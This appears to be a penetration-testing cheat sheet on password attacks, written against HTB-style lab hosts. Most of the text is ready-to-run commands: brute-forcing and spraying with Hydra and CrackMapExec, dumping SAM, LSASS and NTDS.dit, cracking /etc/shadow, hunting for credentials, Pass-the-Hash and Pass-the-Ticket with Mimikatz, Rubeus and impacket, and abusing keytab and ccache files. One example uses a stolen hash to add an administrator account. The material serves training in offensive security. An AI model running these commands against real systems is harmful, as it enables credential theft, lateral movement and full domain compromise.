Password Attacks
Introduction
Passwords are still the most common way people prove who they are online. Simply put, a password or passphrase is a mix of letters, numbers, and symbols that confirms your identity. Every app or system that uses authentication checks your credentials against a database, either on your device or somewhere remote.
Systems store these credentials in databases:
Linux: Encrypted passwords reside in the
/etc/shadow
file.Windows: A more complex process involves multiple components, with encrypted passwords stored in the SAM file at
%SystemRoot%\system32\config\SAM
.
Attacking Methods
There are a few main ways attackers try to crack passwords:
Dictionary Attacks: This method uses a pre-made list of words and phrases, called a dictionary, to guess passwords.
Brute Force Attacks: Here, attackers try every possible combination of characters until they find the right one.
Rainbow Table Attacks: These use pre-calculated tables of password hashes and their matching plaintext versions to speed up cracking.
People often pick simple passwords they can remember, so companies set rules to make passwords stronger. But humans are clever at bending these rules. If a special character is needed, they might just tack one on at the end. If an uppercase letter is required, they’ll capitalize the first one.
Attackers can use personal info, like a pet’s name or birthday, to make brute-forcing smarter. Tools like Hashcat help with this, while CeWL can scan a company’s website for words that might be passwords. People also tend to keep default passwords or reuse them across services. That’s where password spraying shines, once you get valid credentials, you try them everywhere.
cewl <Website_URL> -d <Depth> -m <Min_Length> --lowercase -w <Output_File>
# Example:
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
hashcat --force <Wordlist> -r <Rule_File> --stdout > <Output_File>
# Example:
hashcat --force password.list -r custom.rule --stdout > mut_password.list
Remote Password Attacks
In a network, many protocols, like WinRM, SMB, SSH, and RDP, require login details. Most of these rely on passwords and can often be brute-forced. Tools such as Hydra, CrackMapExec, and Metasploit make these attacks possible.
crackmapexec smb <IP_Address> -u <Username> -p <Password> --shares
# Example:
crackmapexec smb 10.129.201.126 -u Administrator -p P@ssw0rd! --shares
hydra -L <User_List> -P <Password_List> ssh://<IP_Address>
# Example:
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
crackmapexec winrm <IP_Address> -u <User_List> -p <Password_List>
# Example:
crackmapexec winrm 10.10.10.10 -u users.txt -p passwords.txt
Windows Local Password Attacks
The Security Account Manager (SAM) is a database in Windows that holds credentials. If you’re on a Windows machine and have local admin access, you can copy the SAM database to your own system and crack its hashes offline. There are three key registry hives to grab:
HKLM\SAM: Stores hashes for local account passwords.
HKLM\SYSTEM: Holds the system bootkey, which encrypts the SAM database. You’ll need this to unlock it.
HKLM\SECURITY: Contains cached credentials for domain accounts.
You can back up these hives with the
reg.exe
utility. Once you’ve got them, tools likesecretdumps
can pull out the hashes, and Hashcat can crack them. For domain passwords, CrackMapExec can help extract and crack LSA secrets.
reg.exe save hklm\<Hive> <Output_File>
# Example:
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
python3 secretsdump.py -sam <SAM_File> -security <Security_File> -system <System_File> LOCAL
# Example:
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Then there’s LSASS, a vital Windows service that manages credentials and authentication. When you log in, LSASS does things like:
Storing credentials in memory.
Creating access tokens.
Enforcing security rules.
Logging events to the Windows security log.
To attack LSASS, you can dump its memory and extract credentials offline. One way is through Task Manager:
Open Task Manager.
Go to the Processes tab.
Find and right-click “Local Security Authority Process.”
Choose “Create dump file.”
This creates an
lsass.DMP
file inC:\Users\<Your-Username>\AppData\Local\Temp
. Or, from the command line, find the LSASS process ID (PID) withtasklist /svc
in cmd orGet-Process lsass
in PowerShell. Then, in an elevated PowerShell session, run:
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> <Output_File> full
# Example:
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
Note that modern antivirus might block this as suspicious. Bypassing it is a whole other topic! Once you’ve got the dump file, use
pypykatz
to pull credentials:
pypykatz lsa minidump <Dump_File>
Then crack the NT hash with Hashcat:
hashcat -m 1000 <NT_HASH> <Wordlist>
# Example:
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
Linux Local Password Attacks
In Linux, the
/etc/passwd
file lists all users and is readable by everyone. Its password field usually shows an "x", meaning passwords are in/etc/shadow
, which only admins can read. Its format is$<type>$<salt>$<hashed>
, with types like:$1$
– MD5$5$
– SHA-256$6$
– SHA-512
To crack
/etc/shadow
:
sudo cp /etc/passwd /tmp/passwd.bak
sudo cp /etc/shadow /tmp/shadow.bak
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt -o /tmp/unshadowed.cracked
Attacking Active Directory & NTDS.dit
Password Spraying/Brute-Forcing
When a Windows system joins a domain, it stops using the local SAM database for logins. Instead, it asks the domain controller to verify credentials. In Active Directory, brute-forcing can create lots of logs and lock accounts, so attackers need to be sneaky. One trick is using Open-Source Intelligence (OSINT) to figure out username patterns, like "firstname.lastinitial" or "firstinitial.lastname", by checking company emails or online employee info. Tools like
username-anarchy
generate username lists, and CrackMapExec runs the attacks.
./username-anarchy -i <Name_List>
Capturing NTDS.dit
NTDS (NT Directory Services) helps Active Directory organize network resources. The
NTDS.dit
file, found at%systemroot%\ntds
on domain controllers, is its main database. It holds all domain usernames, password hashes, and more. If you grab this file, you could compromise every account in the domain.You’ll need local admin or Domain Admin rights to copy it. One method uses
vssadmin
to make a Volume Shadow Copy (VSS) of the C: drive (or wherever NTDS lives):
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\<Shadow_Copy>\Windows\NTDS\NTDS.dit <Output_Path>
# Example:
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
Or automate it with CrackMapExec:
crackmapexec smb <DC_IP> -u <User_Name> -p <Password> --ntds
Extract the NT hashes and crack them with Hashcat
If cracking fails, try a Pass-the-Hash attack with Evil-WinRM:
evil-winrm -i <DC_IP> -u <User_Name>-H "<NT_HASH>"
Credential Hunting
Once you’re inside a system, hunting for credentials is a top priority. They can hide in files, logs, command histories, memory, browser data, databases, scripts, and more. You can search manually or use tools like LaZagne to automate it.
On Windows, try:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
Or run:
start lazagne.exe all
On Linux, we can check for:
Configuration files:
for l in $(echo ".conf .config .cnf"); do echo -e "\nFile extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done
Passwords in config files:
for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib"); do echo -e "\nFile: $i"; grep "user\|password\|pass" $i 2>/dev/null | grep -v "#"; done
Database files:
for l in $(echo ".sql .db .*db .db*"); do echo -e "\nDB File extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done
SSH Keys:
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
Check bash history:
tail -n5 /home/*/.bash*
Run Mimipenguin:
python3 mimipenguin.py
Pass The Hash Attack
In a Pass-the-Hash (PtH) attack, you use a password hash instead of the actual password. Windows’ NTLM protocol doesn’t salt hashes, so if you have one, you can authenticate without knowing the password. Once the hash is obtained, attackers can use it to authenticate to remote systems via various protocols such as SMB, WinRM, or RDP. Below are common methods and tools for executing PtH attacks:
Get hashes with Mimikatz:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
Then use Mimikatz for PtH:
mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<ntlm_hash> /domain:<domain> /run:cmd.exe" exit
# Example:
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
This opens a new command prompt authenticated as the specified user.
Invoke-TheHash is an another PowerShell toolkit for performing PtH attacks over SMB or WMI. It does not require local administrator privileges on the attacking machine, but the user whose hash is used must have administrative rights on the target.
# SMB
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <target_ip> -Domain <domain> -Username <username> -Hash <ntlm_hash> -Command "<command>" -Verbose
# Example:
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
# WMIExec
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target <target> -Domain <domain> -Username <username> -Hash <ntlm_hash> -Command "<command>"
# Example:
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <encoded_command>"
On Linux, we can use other tools like, Impacket, crackmapexec, or even rdp tools.
impacket-psexec <username>@<target_ip> -hashes :<ntlm_hash>
# Example:
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
crackmapexec smb <target_ip> -u <username> -d <domain> -H <ntlm_hash> -x "<command>"
# Example:
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
For graphical access, we can use PtH over RDP with tools like xfreerdp. This requires that Restricted Admin Mode is enabled on the target system.
# Enable Restricted Admin Mode (if not already enabled):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Use xfreerdp with PtH:
xfreerdp /v:<target_ip> /u:<username> /pth:<ntlm_hash>
# Example:
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
Pass the Ticket (PtT)
Pass the Ticket (PtT) is an attack technique where we steal and reuse Kerberos tickets to gain unauthorized access to network resources in an Active Directory environment. Kerberos uses two types of tickets:
TGT (Ticket Granting Ticket): Allows requesting service tickets from the Key Distribution Center (KDC).
TGS (Ticket Granting Service): Authenticates the user to a specific service.
Unlike Pass the Hash (PtH), which relies on NTLM hashes, PtT exploits Kerberos tickets for authentication.
Extracting Tickets
Attackers extract tickets from a compromised system using tools like Mimikatz or Rubeus:
With Mimikatz:
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
This exports tickets as .kirbi files.
With Rubeus:
Rubeus.exe dump /nowrap
This outputs tickets in base64 format for easy copying.
Importing Tickets
Once extracted, tickets are imported into a session to authenticate as the ticket’s user:
With Mimikatz:
mimikatz # kerberos::ptt <path_to_kirbi_file>
# Example:
mimikatz # kerberos::ptt "C:\Users\plaintext\Desktop[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"
With Rubeus:
Rubeus.exe ptt /ticket:<base64_ticket>
# Alternatively, use a .kirbi file:
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
Pass the Key or OverPass the Hash
Pass the Key, also called OverPass the Hash, uses a user’s password hash (e.g., NTLM or AES keys) to request a TGT from the KDC, creating a new Kerberos ticket without the plaintext password. Unlike traditional PtH, which avoids Kerberos, this method integrates with it.
Obtaining Hashes
First, extract the user’s hash or Kerberos keys:
With Mimikatz:
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
This lists all Kerberos encryption keys (e.g., NTLM, AES256) for logged-on users.
Requesting a TGT
Use the hash to forge a TGT:
With Mimikatz:
mimikatz # sekurlsa::pth /domain:<domain> /user:<username> /ntlm:<ntlm_hash> # Example: mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
This opens a new session with the user’s security context.
With Rubeus:
Rubeus.exe asktgt /domain:<domain> /user:<username> /rc4:<ntlm_hash> /ptt # Example: Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt
The /ptt flag imports the ticket into the current session. Alternatively, use an AES256 key:
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap
Using PtT with PowerShell Remoting
Stolen Kerberos tickets can enable PowerShell Remoting for lateral movement. For this we need to be an admin, a member of the Remote Management Users group, or have explicit PowerShell Remoting permissions.
With Mimikatz, Import the ticket:
mimikatz # privilege::debug
mimikatz # kerberos::ptt "C:\Users\Administrator.WIN01\Desktop[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
mimikatz # exit
Launch PowerShell and connect:
Enter-PSSession -ComputerName DC01
With Rubeus, Create a sacrificial logon session:
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
Import the ticket in the new session:
Rubeus.exe ptt /ticket:<base64_ticket>
Use PowerShell Remoting from that session.
Pass the Ticket on Linux
Linux systems integrated with Active Directory use Kerberos for authentication, storing tickets differently than Windows. We can exploit these tickets for access.
Identifying Domain Integration
Check if the system is domain-joined:
With realm:
realm list
Look for services like sssd or winbind running on the system.
Abusing ccache Files
Kerberos tickets are stored as credential cache (ccache) files, typically in /tmp, with their location set in the KRB5CCNAME environment variable.
Locate the ccache file:
env | grep -i krb5
# Example output: KRB5CCNAME=FILE:/tmp/krb5cc_647401106_I8I133
# Copy the file:
cp /tmp/krb5cc_647401106_I8I133 .
# Set the variable:
export KRB5CCNAME=/root/krb5cc_647401106_I8I133
# Verify with:
klist # Check "valid starting" and "expires" dates expired tickets are unusable.
# Authenticate to services:
smbclient //dc01/C$ -k -c ls
impacket-wmiexec dc01 -k
Abusing Keytab Files
Keytab files store Kerberos keys for authentication without passwords.
Find keytab files:
find / -name "*.keytab" -ls 2>/dev/null
# Inspect the keytab:
klist -k -t /opt/specialfiles/carlos.keytab
# Example output shows principal: carlos@INLANEFREIGHT.HTB.
# Obtain a TGT
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
# Access resources:
smbclient //dc01/carlos -k -c ls
# Extract hashes:
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
# Crack with Hashcat or online tools like crackstation.net.
Tool Support
Impacket: Use
-k
for Kerberos authentication:
impacket-wmiexec dc01 -k -no-pass
Ensure KRB5CCNAME contains only the file path if FILE: prefix is present.
Evil-WinRM: Requires krb5-user package and /etc/krb5.conf setup:
evil-winrm -i dc01 -r inlanefreight.htb
Linikatz: Extracts credentials from AD-integrated Linux systems (requires root): Outputs tickets in linikatz.* folders as ccache or keytab files.
Ticket Conversion: Convert ccache to .kirbi or vice versa:
impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi
Cracking Encrypted Files
Sensitive files may be password-protected. Use John the Ripper to crack them. Examples:
SSH Keys:
ssh2john.py SSH.private > ssh.hash
john --wordlist=rockyou.txt ssh.hash
Office Documents:
office2john.py Protected.docx > protected-docx.hash
john --wordlist=rockyou.txt protected-docx.hash
Last updated